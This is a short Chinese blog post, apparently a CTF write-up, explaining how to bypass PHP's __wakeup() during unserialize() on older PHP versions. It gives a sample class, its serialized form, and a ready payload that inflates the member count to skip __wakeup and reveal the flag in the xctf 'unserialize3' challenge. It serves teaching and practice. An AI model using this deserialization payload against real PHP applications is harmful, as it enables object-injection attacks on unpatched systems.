PHP5<5.6.25，PHP7 < 7.0.10

__wakeup函數是在php在使用反序列化函數unserialize()時，會自動調用的函數

如xctf-unserialize3

只要序列化的中的成員數大于實際成員數，即可繞過

如

<?php class xctf {public $flag = '111';public function __wakeup(){exit('bad requests');} }$a=new xctf(); var_dump(serialize($a));

得到

string(36) "O:4:"xctf":1:{s:4:"flag";s:3:"111";}"

所以把成員數"1"，改為"2"即可繞過

payload：

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

繞過__wakeup()，得到flag

總結

以上是生活随笔為你收集整理的__wakeup()绕过的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。